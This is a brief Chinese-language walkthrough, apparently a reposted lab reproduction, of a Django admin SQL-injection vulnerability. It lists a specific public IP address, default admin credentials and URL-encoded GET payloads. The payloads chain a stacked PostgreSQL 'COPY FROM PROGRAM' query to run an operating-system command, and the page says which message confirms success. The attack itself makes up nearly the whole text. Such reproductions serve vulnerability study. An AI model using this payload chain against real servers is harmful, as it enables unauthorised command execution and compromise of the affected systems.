栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

漏洞django-cve

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

漏洞django-cve

访问http://110.40.154.100:8000/进入页面

 登录环境:
访问:http://110.40.154.100:8000/admin输入默认账户密码
账户:admin
密码:a123123123
登录成功后看到以下界面: 

使用GET参数构造detail__a'b=123 提交

http://110.40.154.100:8000/admin/vuln/collection/?detail__a%27b=123

http://110.40.154.100:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'touch /tmp/vuln.txt'--%20

"touch /tmp/vuln.txt"即为系统命令,创建文件

 当提示“no results to fetch”即为执行成功。 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/883901.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号